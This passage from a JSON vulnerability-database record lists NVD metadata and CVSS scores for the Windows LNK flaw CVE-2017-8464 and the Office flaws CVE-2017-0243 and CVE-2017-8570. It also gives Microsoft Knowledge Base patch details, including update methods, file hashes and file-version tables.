and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka \"LNK Remote Code Execution Vulnerability.\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "cve", "title": "CVE-2017-8464", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2017-8464", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8464", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-08T15:37:20", "description": "Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka \"Microsoft Office Remote Code Execution Vulnerability\". This CVE ID is unique from CVE-2017-8570.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "type": "cve", "title": "CVE-2017-0243", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0243", "CVE-2017-8570"], "modified": "2017-07-20T13:27:00", "cpe": ["cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:web_applications:2010", "cpe:/a:microsoft:office:2010", "cpe:/a:microsoft:business_productivity_servers:2010"], "id": "CVE-2017-0243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0243", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:business_productivity_servers:2010:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:web_applications:2010:sp2:*:*:*:*:*:*"]}, {"lastseen": "2023-02-08T16:15:55", "description": "Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka \"Microsoft Office Remote Code Execution Vulnerability\". This CVE ID is unique from CVE-2017-0243.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T21:29:00", "type": "cve", "title": "CVE-2017-8570", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0243", "CVE-2017-8570"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:microsoft:office:2016", "cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2010"], "id": "CVE-2017-8570", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8570", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:rt:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*"]}], "mskb": [{"lastseen": "2023-03-15T10:19:06", "description": "None\n## Summary\n\nA remote code execution exists in Microsoft Windows that could allow remote code execution if the icon of a specially crafted shortcut is displayed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \nTo learn more about the vulnerability, see[ CVE-2017-8464](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-8464>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4021903>) website. \n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: June 13, 2017](<http://support.microsoft.com/en-us/help/20170613>)\n\n## More Information\n\n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files. \n \n**Windows Server 2008 file information**\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## How to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update: FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\n## File Information\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4021903-x86.msu| E242C183D5161A316B402855F03C57150EF59CF4| 012F5FA414B1B6B36855DD20E476FEDD457402C16A4D54E67BC689248D68C8C2 \nWindows6.0-KB4021903-ia64.msu| DCA18000239FA5C77F2F72C5D7E4C4F9D3442152| 1892A9631E1D1CCA3676D875A5609A08B4A945C809B277FD2F3804F1B2A28BFA \nWindows6.0-KB4021903-x64.msu| D945E443391871F55A9D01D3FDD4C6C48370ECEC| 13F6CF468A08B8C36523B13D70ECB21D9B5B77CDD681208685F80C57AD348618 \n \n## For all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nShell32.dll| 6.0.6002.19785| 11,588,096| 11-May-2017| 15:55| x86 \nShell32.dll| 6.0.6002.24102| 11,591,168| 10-May-2017| 19:10| x86 \n \n## For all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nShell32.dll| 6.0.6002.19785| 19,090,432| 11-May-2017| 15:42| IA-64 \nShell32.dll| 6.0.6002.24102| 19,098,624| 10-May-2017| 15:17| IA-64 \nShell32.dll| 6.0.6002.19785| 11,588,096| 11-May-2017| 15:55| x86 \nShell32.dll| 6.0.6002.24102| 11,591,168| 10-May-2017| 19:10| x86 \n \n## For all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nShell32.dll| 6.0.6002.19785| 12,901,888| 11-May-2017| 16:11| x64 \nShell32.dll| 6.0.6002.24102| 12,905,984| 10-May-2017| 18:03| x64 \nShell32.dll| 6.0.6002.19785| 11,588,096| 11-May-2017| 15:55| x86 \nShell32.dll| 6.0.6002.24102| 11,591,168| 10-May-2017| 19:10| x86\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mskb", "title": "LNK remote code execution vulnerability: June 13, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2017-06-13T07:00:00", "id": "KB4021903", "href": "https://support.microsoft.com/en-us/help/4021903", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:05:31", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 2 for Office 2010](<http://support.microsoft.com/kb/2687455>) installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>). \n--- \n \n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB3213624>) website. \n--- \n \n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download the security update KB3213624 for the 32-bit version of Office 2010](<http://www.microsoft.com/download/details.aspx?familyid=9dcb6ee0-6209-4ce0-af94-a69e2e00d534>)\n * [Download the security update KB3213624 for the 64-bit version of Office 2010](<http://www.microsoft.com/download/details.aspx?familyid=ab38a40b-1872-4943-a35a-6e35df1e599c>) \n--- \n \n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: July 11, 2017](<https://support.microsoft.com/en-us/help/20170711>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [KB3203460](<http://support.microsoft.com/kb/3203460>).\n\n### File hash information\n\nPackage Name| Package Hash SHA 1| Package Hash SHA 2 \n---|---|--- \nmso2010-kb3213624-fullfile-x86-glb.exe| B7ACB07450F66F668F4619BF6272AA5D972EE515| 5E8C6CFB9751DEC962EC7B09560908EACFD10E7352057EBBF5CF4F6E1CA2DC71 \nmso2010-kb3213624-fullfile-x64-glb.exe| 64354AF9E4D30C22C916CCFBD6DBA9D2B1A19DFD| CF4A005CF5BFDFF5F7E4421BD29BA8E64A8750C69D7D8CF43CBED77955DFA031 \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files.For all supported x86-based versions of Office 2010| File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmso.dll.x86| mso.dll| 14.0.7184.5000| 18,642,688| 06-Jul-2017| 04:19 \nFor all supported x64-based versions of Office 2010File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nmso.dll.x64| mso.dll| 14.0.7184.5000| 24,346,368| 05-Jul-2017| 02:33 \nmso.dll.x86| mso.dll| 14.0.7184.5000| 18,642,688| 06-Jul-2017| 04:19 \n \n## How to get help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<https://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<https://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)Propose a feature or provide feedback on Office Core: [Office User Voice portal](<https://office.uservoice.com/>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-11T07:00:00", "type": "mskb", "title": "Description of the security update for Office 2010: July 11, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570"], "modified": "2017-07-11T07:00:00", "id": "KB3213624", "href": "https://support.microsoft.com/en-us/help/3213624", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-12T11:13:17", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 1 for Microsoft Office 2013](<http://support.microsoft.com/kb/2817430>) installed on the computer.\n\n## Improvements and fixes\n\nThis security update contains improvements and fixes for the following nonsecurity issues:\n\n * This update includes the improved translations for the following applications:\n * The Danish version of Access, Excel, and Word.\n * The Finnish and Swedish versions of Excel.\n * The Serbian version of Outlook.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>). \n--- \n \n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB3213555>) website. \n--- \n \n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download the security update KB3213555 for the 32-bit version of Office 2013](<http://www.microsoft.com/download/details.aspx?familyid=d46a5a32-cd74-483c-846a-224328067a92>)\n * [Download the security update KB3213555 for the 64-bit version of Office 2013](<http://www.microsoft.com/download/details.aspx?familyid=4dd698e3-3c96-4b35-b926-aff47fff9934>) \n--- \n \n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: July 11, 2017](<https://support.microsoft.com/en-us/help/20170711>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [KB3203386](<http://support.microsoft.com/kb/3203386>).\n\n### File hash information\n\nPackage Name| Package Hash SHA 1| Package Hash SHA 2 \n---|---|--- \nmso2013-kb3213555-fullfile-x86-glb.exe| 5CC91F57A0D767B6451912E3B35F89FF0C7B5B9E| C5FC2C30251E4B43968488E19E37A2EE49F11ACD7362D69998966FAF7F8F178C \nmso2013-kb3213555-fullfile-x64-glb.exe| 6148662532C5F32B68B8DDDA2AFCC76ED69C6BA0| 3A9ABC30225DB1AE43A0CD1B7459E6710363B9B833A6FBB1AD7A3DE28726DA13 \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files. \nFor all supported x86-based versions of Office 2013| File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nfirstrun.exe| firstrun.exe| 15.0.4927.1000| 998592| 25-Jun-17| 04:24 \nmsointl.dll.x86.1025| msointl.dll| 15.0.4903.1000| 4330240| 26-Jun-17| 08:22 \nmsointl.dll.x86.1026| msointl.dll| 15.0.4903.1000| 3243256| 26-Jun-17| 08:22 \nmsointl.dll.x86.1027| msointl.dll| 15.0.4897.1000| 3237120| 26-Jun-17| 08:22 \nmsointl.dll.x86.1029| msointl.dll| 15.0.4903.1000| 3238144| 26-Jun-17| 08:22 \nmsointl.dll.x86.1030| msointl.dll| 15.0.4945.1000| 3024128| 26-Jun-17| 08:22 \nmsointl.dll.x86.1031| msointl.dll| 15.0.4903.1000| 3183864| 26-Jun-17| 08:22 \nmsointl.dll.x86.1032| msointl.dll| 15.0.4903.1000| 3605752| 26-Jun-17| 08:22 \nmsointl.dll.x86.3082| msointl.dll| 15.0.4903.1000| 3212536| 26-Jun-17| 08:22 \nmsointl.dll.x86.1061| msointl.dll| 15.0.4903.1000| 3001080| 26-Jun-17| 08:22 \nmsointl.dll.x86.1069| msointl.dll| 15.0.4897.1000| 3093240| 26-Jun-17| 08:22 \nmsointl.dll.x86.1035| msointl.dll| 15.0.4945.1000| 3016448| 26-Jun-17| 08:22 \nmsointl.dll.x86.1036| msointl.dll| 15.0.4903.1000| 3871496| 26-Jun-17| 08:22 \nmsointl.dll.x86.1110| msointl.dll| 15.0.4897.1000| 3152128| 26-Jun-17| 08:22 \nmsointl.dll.x86.1095| msointl.dll| 15.0.4897.1000| 3019512| 26-Jun-17| 08:22 \nmsointl.dll.x86.1037| msointl.dll| 15.0.4903.1000| 4118216| 26-Jun-17| 08:22 \nmsointl.dll.x86.1081| msointl.dll| 15.0.4903.1000| 3093240| 26-Jun-17| 08:22 \nmsointl.dll.x86.1050| msointl.dll| 15.0.4903.1000| 3103992| 26-Jun-17| 08:22 \nmsointl.dll.x86.1038| msointl.dll| 15.0.4903.1000| 3294464| 26-Jun-17| 08:22 \nmsointl.dll.x86.1057| msointl.dll| 15.0.4903.1000| 2812672| 26-Jun-17| 08:22 \nmsointl.dll.x86.1040| msointl.dll| 15.0.4903.1000| 3130624| 26-Jun-17| 08:22 \nmsointl.dll.x86.1041| msointl.dll| 15.0.4903.1000| 3093248| 26-Jun-17| 08:22 \nmsointl.dll.x86.1087| msointl.dll| 15.0.4903.1000| 3288832| 26-Jun-17| 08:22 \nmsointl.dll.x86.1099| msointl.dll| 15.0.4897.1000| 3162880| 26-Jun-17| 08:22 \nmsointl.dll.x86.1042| msointl.dll| 15.0.4937.1000| 3764480| 26-Jun-17| 08:22 \nmsointl.dll.x86.1063| msointl.dll| 15.0.4903.1000| 3245304| 26-Jun-17| 08:22 \nmsointl.dll.x86.1062| msointl.dll| 15.0.4903.1000| 3211512| 26-Jun-17| 08:22 \nmsointl.dll.x86.1086| msointl.dll| 15.0.4903.1000| 2831616| 26-Jun-17| 08:22 \nmsointl.dll.x86.1044| msointl.dll| 15.0.4903.1000| 2938112| 26-Jun-17| 08:22 \nmsointl.dll.x86.1043| msointl.dll| 15.0.4903.1000| 3098880| 26-Jun-17| 08:22 \nmsointl.dll.x86.1045| msointl.dll| 15.0.4903.1000| 3326200| 26-Jun-17| 08:22 \nmsointl.dll.x86.1046| msointl.dll| 15.0.4903.1000| 3131136| 26-Jun-17| 08:22 \nmsointl.dll.x86.2070| msointl.dll| 15.0.4903.1000| 3155704| 26-Jun-17| 08:22 \nmsointl.dll.x86.1048| msointl.dll| 15.0.4903.1000| 3270912| 26-Jun-17| 08:22 \nmsointl.dll.x86.1049| msointl.dll| 15.0.4903.1000| 3285760| 26-Jun-17| 08:22 \nmsointl.dll.x86.1051| msointl.dll| 15.0.4903.1000| 3285752| 26-Jun-17| 08:22 \nmsointl.dll.x86.1060| msointl.dll| 15.0.4903.1000| 3099392| 26-Jun-17| 08:22 \nmsointl.dll.x86.2074| msointl.dll| 15.0.4945.1000| 3141376| 26-Jun-17| 08:22 \nmsointl.dll.x86.1053| msointl.dll| 15.0.4945.1000| 2985720| 26-Jun-17| 08:22 \nmsointl.dll.x86.1054| msointl.dll| 15.0.4903.1000| 2932992| 26-Jun-17| 08:22 \nmsointl.dll.x86.1055| msointl.dll| 15.0.4903.1000| 3155192| 26-Jun-17| 08:22 \nmsointl.dll.x86.1058| msointl.dll| 15.0.4903.1000| 3265784| 26-Jun-17| 08:22 \nmsointl.dll.x86.1066| msointl.dll| 15.0.4903.1000| 3275000| 26-Jun-17| 08:22 \nmsointl.dll.x86.2052| msointl.dll| 15.0.4903.1000| 3110088| 26-Jun-17| 08:22 \nmsointl.dll.x86.1028| msointl.dll| 15.0.4903.1000| 3182784| 26-Jun-17| 08:22 \nmsointl.dll.x86.1033| msointl.dll| 15.0.4897.1000| 3819264| 25-Jun-17| 04:24 \nacmcompanion.mso.dll| mso.dll| 15.0.4945.1001| 26942720| | \nmso.dll.x86| mso.dll| 15.0.4945.1001| 26942720| 25-Jun-17| 04:24 \nmsores.dll| msores.dll| 15.0.4913.1000| 133647104| 25-Jun-17| 04:24 \nmsores.dll.x86| msores.dll| 15.0.4913.1000| 133647104| 25-Jun-17| 04:27 \nacmserver.office.dll| office.dll| 15.0.4945.1001| 466640| 25-Jun-17| 04:24 \ndcfoffice.dll| office.dll| 15.0.4945.1001| 466640| 25-Jun-17| 04:24 \ndcfoffice.dll.x86| office.dll| 15.0.4945.1001| 466640| 25-Jun-17| 04:24 \noffice.dll| office.dll| 15.0.4945.1001| 466640| 25-Jun-17| 04:24 \nmsosqm.exe| msosqm.exe| 15.0.4919.1000| 559336| 25-Jun-17| 04:24 \nmsointl.rest.idx_dll.x86.1025| msointl.rest.idx_dll| 15.0.4859.1000| 1499848| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1026| msointl.dll.idx_dll| 15.0.4460.1000| 53312| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1026| msointl.rest.idx_dll| 15.0.4859.1000| 1503424| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1027| msointl.dll.idx_dll| 15.0.4442.1000| 52848| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1027| msointl.rest.idx_dll| 15.0.4853.1000| 1476800| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1029| msointl.dll.idx_dll| 15.0.4454.1000| 52800| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1029| msointl.rest.idx_dll| 15.0.4859.1000| 1468608| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1030| msointl.dll.idx_dll| 15.0.4442.1000| 52336| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1030| msointl.rest.idx_dll| 15.0.4945.1000| 1464520| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1031| msointl.rest.idx_dll| 15.0.4859.1000| 1470656| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1032| msointl.dll.idx_dll| 15.0.4448.1000| 52800| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1032| msointl.rest.idx_dll| 15.0.4859.1000| 1476288| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1033| msointl.rest.idx_dll| 15.0.4853.1000| 1493760| 25-Jun-17| 04:24 \nmsointl.rest.idx_dll.x86.3082| msointl.rest.idx_dll| 15.0.4859.1000| 1479360| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1061| msointl.dll.idx_dll| 15.0.4463.1000| 52816| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1061| msointl.rest.idx_dll| 15.0.4859.1000| 1475264| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1069| msointl.dll.idx_dll| 15.0.4442.1000| 52352| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1069| msointl.rest.idx_dll| 15.0.4853.1000| 1476800| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1035| msointl.dll.idx_dll| 15.0.4445.1000| 52800| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1035| msointl.rest.idx_dll| 15.0.4945.1000| 1465032| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1036| msointl.rest.idx_dll| 15.0.4885.1000| 1476800| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1110| msointl.dll.idx_dll| 15.0.4442.1000| 52336| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1110| msointl.rest.idx_dll| 15.0.4853.1000| 1480384| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1095| msointl.dll.idx_dll| 15.0.4527.1000| 52392| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1095| msointl.rest.idx_dll| 15.0.4853.1000| 1488072| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1037| msointl.rest.idx_dll| 15.0.4859.1000| 1483968| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1081| 